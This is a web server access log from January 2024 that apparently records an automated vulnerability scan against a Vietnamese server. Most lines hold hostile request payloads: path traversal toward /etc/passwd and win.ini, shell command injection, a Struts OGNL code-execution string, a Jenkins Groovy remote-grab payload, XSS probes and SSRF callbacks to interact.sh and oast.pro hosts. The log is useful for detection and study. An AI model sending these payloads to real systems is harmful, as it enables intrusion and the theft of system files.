2024-01-05 01:11:22 103.153.214.94 GET /sympa referer=http://interact.sh&amp;passwd&amp;previous_action&amp;action=login&amp;action_login&amp;previous_list&amp;list&amp;email 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 01:11:29 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword apiUrl=http://cmbglsthtacjkv124nvgw1yxqfcx7t6w4.oast.pro 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 9
2024-01-05 01:11:54 103.153.214.94 POST /struts2-rest-showcase/orders/3 - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 8
2024-01-05 01:11:57 103.153.214.94 POST /orders/3 - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 6
2024-01-05 01:12:07 103.153.214.94 GET /command.cgi cat%20/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 6
2024-01-05 01:12:14 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 10
2024-01-05 01:12:15 103.153.214.94 GET /dolibarr/adherents/cartes/carte.php mode=cardlogin&amp;foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;model=5160&amp;optioncss=print 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 6
2024-01-05 01:12:25 103.153.214.94 GET /global-protect/login.esp user=j%22;-alert(1)-%22x 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 01:13:14 103.153.214.94 HEAD /msdeploy.axd site=donthu.gdtsolutions.vn 8172 - 116.96.77.140 - - 401 2 5 31
2024-01-05 01:13:14 103.153.214.94 HEAD /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 48
2024-01-05 01:13:14 103.153.214.94 HEAD /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 48
2024-01-05 01:13:14 103.153.214.94 POST /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 VSCmdLine:WTE8.0.9.5106;sid=19e75cac-cf49-456a-ad4f-f252d645ab56;op=Sync - 200 0 0 381
2024-01-05 01:13:14 103.153.214.94 POST /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 517
2024-01-05 01:13:39 103.153.214.94 HEAD /msdeploy.axd site=donthu.gdtsolutions.vn 8172 - 116.96.77.140 - - 401 2 5 28
2024-01-05 01:13:39 103.153.214.94 HEAD /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 45
2024-01-05 01:13:39 103.153.214.94 HEAD /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 48
2024-01-05 01:13:39 103.153.214.94 POST /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 VSCmdLine:WTE8.0.9.5106;sid=a7b43a51-2a94-4c84-8210-7ee76536f77b;op=Sync - 200 0 0 316
2024-01-05 01:13:39 103.153.214.94 POST /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 446
2024-01-05 01:13:39 103.153.214.94 HEAD /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 31
2024-01-05 01:13:40 103.153.214.94 POST /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 - - 200 0 0 769
2024-01-05 01:13:40 103.153.214.94 POST /msdeploy.axd site=donthu.gdtsolutions.vn 8172 khieunai 116.96.77.140 VSCmdLine:WTE8.0.9.5106;sid=a7b43a51-2a94-4c84-8210-7ee76536f77b;op=Sync - 200 0 0 643
2024-01-05 01:16:05 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 8
2024-01-05 01:16:29 103.153.214.94 GET /index.php debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&amp;start_debug=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 8
2024-01-05 01:16:40 103.153.214.94 GET /api/jolokia/read&lt;svg+onload=alert(document.domain)&gt; mimeType=text/html 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 400 0 0 16
2024-01-05 01:16:43 103.153.214.94 GET /jolokia/read&lt;svg+onload=alert(document.domain)&gt; mimeType=text/html 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 400 0 0 6
2024-01-05 01:20:42 103.153.214.94 GET /uir/etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 14
2024-01-05 01:20:56 103.153.214.94 GET /verify.php id=1&amp;confirm_hash 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 6
2024-01-05 01:20:59 103.153.214.94 GET /mantis/verify.php id=1&amp;confirm_hash 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 5
2024-01-05 01:21:02 103.153.214.94 GET /mantisBT/verify.php id=1&amp;confirm_hash 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 8
2024-01-05 01:21:05 103.153.214.94 GET /mantisbt-2.3.0/verify.php id=1&amp;confirm_hash 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 7
2024-01-05 01:21:08 103.153.214.94 GET /bugs/verify.php confirm_hash&amp;id=1 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 6
2024-01-05 01:22:17 103.153.214.94 GET /chkisg.htm?Sip=1.1.1.1+|+cat+/etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 400 0 0 20
2024-01-05 01:23:28 103.153.214.94 POST /admin/index.php id=pages 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 14
2024-01-05 01:24:34 103.153.214.94 POST /upload/index.php route=extension/payment/divido/update 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 7
2024-01-05 01:25:39 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 8
2024-01-05 01:25:42 103.153.214.94 POST /GponForm/diag_Form images/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 5
2024-01-05 01:26:24 103.153.214.94 GET /index.php/community/ %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 7
2024-01-05 01:26:44 103.153.214.94 POST /system/sharedir.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 14
2024-01-05 01:26:47 103.153.214.94 POST /en/php/usb_sync.php - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 6
2024-01-05 01:27:31 103.153.214.94 GET /${(#_memberAccess[&quot;allowStaticMethodAccess&quot;]=true,#a=@java.lang.Runtime@getRuntime().exec(&#039;cat+/etc/passwd&#039;).getInputStream(),#b=new+java.io.InputStreamReader(#a),#c=new++java.io.BufferedReader(#b),#d=new+char[51020],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 400 0 0 16
2024-01-05 01:27:35 103.153.214.94 GET /interact.sh - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 6
2024-01-05 01:27:53 103.153.214.94 GET /cgi-bin/login LD_DEBUG=files 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 10
2024-01-05 01:27:59 103.153.214.94 GET /img.php f=/./etc/./passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 29
2024-01-05 01:28:14 103.153.214.94 GET /cms/info.php mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 52
2024-01-05 01:30:27 103.153.214.94 POST /api/external/7.0/system.System.get_infos - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 14
2024-01-05 01:31:23 103.153.214.94 GET /users/registration - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6
2024-01-05 01:31:54 103.153.214.94 GET /echo-server.html code=test&amp;state=http://www.interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 01:33:28 103.153.214.94 GET /en-US/splunkd/__raw/services/server/info/server-info output_mode=json 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 11
2024-01-05 01:33:31 103.153.214.94 GET /__raw/services/server/info/server-info output_mode=json 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7
2024-01-05 01:33:48 103.153.214.94 GET /jkstatus - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 14
2024-01-05 01:33:51 103.153.214.94 GET /jkstatus; - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 5
2024-01-05 01:33:52 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 0 41
2024-01-05 01:33:55 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 0 0 28
2024-01-05 01:33:58 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 0 0 23
2024-01-05 01:34:01 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 0 0 21
2024-01-05 01:34:50 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&amp;firmware=/../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 9
2024-01-05 01:34:53 103.153.214.94 GET /server/node_upgrade_srv.js action=downloadFirmware&amp;firmware=/../../../../../../../../../../Windows/win.ini 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 60
2024-01-05 01:36:16 103.153.214.94 GET /html/log - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 8
2024-01-05 01:36:28 103.153.214.94 GET /index.php target=db_sql.php%253f/../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 6
2024-01-05 01:37:35 103.153.214.94 GET /web/cgi-bin/hi3510/param.cgi cmd=setmobilesnapattr&amp;cururl=http%3A%2F%2Finteract.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 8
2024-01-05 01:39:06 103.153.214.94 GET /index.php op=fileviewer&amp;file=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 8
2024-01-05 01:40:15 103.153.214.94 GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 35
2024-01-05 01:40:24 103.153.214.94 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 7
2024-01-05 01:40:27 103.153.214.94 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 18
2024-01-05 01:40:30 103.153.214.94 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 18
2024-01-05 01:40:33 103.153.214.94 GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 10
2024-01-05 01:40:36 103.153.214.94 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 01:40:39 103.153.214.94 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 10
2024-01-05 01:40:51 103.153.214.94 PUT /meta - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 6
2024-01-05 01:42:09 103.153.214.94 GET /remote/fgt_lang lang=/../../../..//////////dev/cmdb/sslvpn_websession 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 9
2024-01-05 01:43:12 103.153.214.94 GET /assets/php/filebrowser/filebrowser.main.php file=../../../../../../../../../../etc/passwd&amp;do=download 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 01:43:14 103.153.214.94 GET /zimbra/h/search si=1&amp;so=0&amp;sfi=4&amp;st=message&amp;csi=1&amp;action&amp;cso=0&amp;id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 10
2024-01-05 01:43:31 103.153.214.94 GET /www.interact.sh - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 6
2024-01-05 01:44:34 103.153.214.94 GET /static/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 400 0 0 12
2024-01-05 01:44:37 103.153.214.94 GET /spring-mvc-showcase/resources/%5c%5c..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/..%5c/windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 400 0 0 14
2024-01-05 01:45:16 103.153.214.94 POST /account - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 7
2024-01-05 01:45:20 103.153.214.94 POST /account - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 35
2024-01-05 01:45:55 103.153.214.94 POST /filemanager/upload.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 01:47:35 103.153.214.94 GET /cgit/cgit.cgi/git/objects/ path=../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 12
2024-01-05 01:50:05 103.153.214.94 GET /message title=x&amp;msg=%26%23%3Csvg/onload=alert(1337)%3E%3B 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 9
2024-01-05 01:50:08 103.153.214.94 GET /remote/error errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 8
2024-01-05 01:50:11 103.153.214.94 GET /webui/file_guest path=/var/www/documentation/../../../../../etc/passwd&amp;flags=1152 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 24
2024-01-05 01:50:12 103.153.214.94 GET /login next=http://interact.sh/?app.scan/ 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 6
2024-01-05 01:50:15 103.153.214.94 GET /signup next=http://interact.sh/?app.scan/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 5
2024-01-05 01:50:42 103.153.214.94 GET /IntellectMain.jsp IntellectSystem=https://www.interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 6
2024-01-05 01:51:53 103.153.214.94 GET /index.php/System/MailConnect/host/cmbglsthtacjkv124nvgimf13oywenr3h.oast.pro/port/80/secure/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 12
2024-01-05 01:52:56 103.153.214.94 GET /filemanager/ajax_calls.php action=get_file&amp;sub_action=preview&amp;preview_mode=text&amp;title=source&amp;file=../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 8
2024-01-05 01:53:10 103.153.214.94 GET /WEBACCOUNT.CGI OkBtn=++Ok++&amp;RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&amp;USEREDIRECT=1&amp;WEBACCOUNTID&amp;WEBACCOUNTPASSWORD 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 8
2024-01-05 01:56:10 103.153.214.94 POST /fcgi-bin/wgsetcgi - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 110
2024-01-05 01:57:27 103.153.214.94 GET /bibliopac/bin/wxis.exe/bibliopac/ IsisScript=bibliopac/bin/bibliopac.xic&amp;db=&quot;&gt;&lt;script&gt;prompt(document.domain)&lt;/script&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 10
2024-01-05 01:57:41 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6
2024-01-05 01:58:19 103.153.214.94 POST /upload - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 8
2024-01-05 01:58:37 103.153.214.94 GET /wp-content/plugins/wechat-broadcast/wechat/Image.php url=../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 7
2024-01-05 01:58:53 103.153.214.94 GET /wp-content/plugins/localize-my-post/ajax/include.php file=../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 7
2024-01-05 01:58:55 103.153.214.94 GET /ipecs-cm/download filename=../../../../../../../../../../etc/passwd&amp;filepath=/home/wms/www/data 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 5
2024-01-05 01:58:58 103.153.214.94 GET /ipecs-cm/download filename=jre-6u13-windows-i586-p.exe&amp;filepath=../../../../../../../../../../etc/passwd%00.jpg 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 5
2024-01-05 02:01:10 103.153.214.94 GET /nuxeo/login.jsp/pwn${31333333330+7}.xhtml - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 11 0 11
